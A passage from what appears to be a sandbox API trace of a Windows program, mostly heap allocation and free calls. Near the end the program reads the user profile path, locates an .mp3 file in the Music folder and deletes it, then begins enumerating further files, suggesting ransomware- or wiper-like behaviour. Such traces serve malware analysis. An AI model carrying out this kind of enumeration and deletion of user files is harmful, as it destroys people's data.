lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0247.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0247.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0247.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0247.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0247.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0247.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0247.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0247.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0247.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0247.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0247.002] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0247.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0247.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0247.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0247.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55f48 [0247.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0247.002] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0247.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55f48 | out: hHeap=0x970000) returned 1 [0247.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0247.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fb0 [0247.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0247.002] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0247.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0247.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0247.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0247.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0247.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0247.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0247.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0247.002] FreeLibrary (hLibModule=0x756e0000) returned 1 [0247.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0247.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0247.003] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0247.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0247.003] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0247.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0247.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0247.003] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0247.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0247.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0247.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0247.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0247.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0247.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0247.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0247.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0247.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f38 [0247.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50da0 [0247.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f20 [0247.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0247.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fb0 [0247.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0247.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0247.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d28 [0247.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0247.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0247.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0247.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0247.004] CloseHandle (hObject=0x2a0) returned 1 [0247.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0247.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0247.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0247.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0247.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0247.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0247.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0247.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0247.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0247.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0247.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0247.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0247.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0247.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0247.044] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0247.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0247.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0247.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0247.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0247.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0247.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0247.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0247.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0247.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fb0 [0247.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d88 [0247.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d58 [0247.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0247.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ed8 [0247.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0247.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0247.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50da0 [0247.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0247.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0247.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0247.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0247.045] CloseHandle (hObject=0x2d0) returned 1 [0247.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0247.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0247.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0247.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0247.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0247.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0247.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0247.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0247.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0247.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0247.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0247.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0247.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0247.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0247.049] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0247.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0247.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0247.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0247.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0247.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0247.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0247.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0247.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0247.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0247.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0247.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0247.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0247.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0247.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0247.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0247.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0247.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0247.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0247.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0247.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54710 | out: hHeap=0x970000) returned 1 [0247.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0247.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54800 | out: hHeap=0x970000) returned 1 [0247.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0247.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0247.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0247.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546e8 | out: hHeap=0x970000) returned 1 [0247.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0247.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0247.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0247.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547d8 | out: hHeap=0x970000) returned 1 [0247.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0247.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54648 | out: hHeap=0x970000) returned 1 [0247.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0247.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54620 | out: hHeap=0x970000) returned 1 [0247.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0247.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547b0 | out: hHeap=0x970000) returned 1 [0247.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0247.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54788 | out: hHeap=0x970000) returned 1 [0247.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0247.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0247.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0247.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545f8 | out: hHeap=0x970000) returned 1 [0247.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0247.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0247.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b58 | out: hHeap=0x970000) returned 1 [0247.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0247.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545a8 | out: hHeap=0x970000) returned 1 [0247.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0247.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0247.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54580 | out: hHeap=0x970000) returned 1 [0247.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0247.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54670 | out: hHeap=0x970000) returned 1 [0247.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0247.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545d0 | out: hHeap=0x970000) returned 1 [0247.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0247.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546c0 | out: hHeap=0x970000) returned 1 [0247.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0247.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0247.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0247.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54828 | out: hHeap=0x970000) returned 1 [0247.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0247.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0247.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0247.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54698 | out: hHeap=0x970000) returned 1 [0247.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0247.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0247.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0247.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0247.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0247.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0247.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0247.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0247.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0247.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0247.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0247.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0247.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0247.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0247.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0247.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0247.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0247.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0247.053] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0247.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0247.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0247.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0247.053] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0247.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0247.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54828 [0247.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0247.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0247.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0247.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0247.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x2e54858 [0247.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54828 | out: hHeap=0x970000) returned 1 [0247.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0247.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0247.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0247.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0247.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0247.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0247.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0247.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0247.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0247.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0247.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x52) returned 0x2e58910 [0247.054] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RDmw5DGaT83 YD.mp3", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\RDmw5DGaT83 YD.mp3", lpFilePart=0x8cedf4*="RDmw5DGaT83 YD.mp3") returned 0x28 [0247.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0247.054] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\RDmw5DGaT83 YD.mp3" (normalized: "c:\\users\\fd1hvy\\music\\rdmw5dgat83 yd.mp3")) returned 0x20 [0247.054] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RDmw5DGaT83 YD.mp3", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd5fe470, ftCreationTime.dwHighDateTime=0x1d5f0b6, ftLastAccessTime.dwLowDateTime=0x6bc86c70, ftLastAccessTime.dwHighDateTime=0x1d5e5eb, ftLastWriteTime.dwLowDateTime=0x6bc86c70, ftLastWriteTime.dwHighDateTime=0x1d5e5eb, nFileSizeHigh=0x0, nFileSizeLow=0x1565c, dwReserved0=0x1, dwReserved1=0x1c, cFileName="RDmw5DGaT83 YD.mp3", cAlternateFileName="RDMW5D~1.MP3")) returned 0xa86f90 [0247.054] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\RDmw5DGaT83 YD.mp3" (normalized: "c:\\users\\fd1hvy\\music\\rdmw5dgat83 yd.mp3")) returned 1 [0247.093] FindNextFileW (in: hFindFile=0xa86f90, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd5fe470, ftCreationTime.dwHighDateTime=0x1d5f0b6, ftLastAccessTime.dwLowDateTime=0x6bc86c70, ftLastAccessTime.dwHighDateTime=0x1d5e5eb, ftLastWriteTime.dwLowDateTime=0x6bc86c70, ftLastWriteTime.dwHighDateTime=0x1d5e5eb, nFileSizeHigh=0x0, 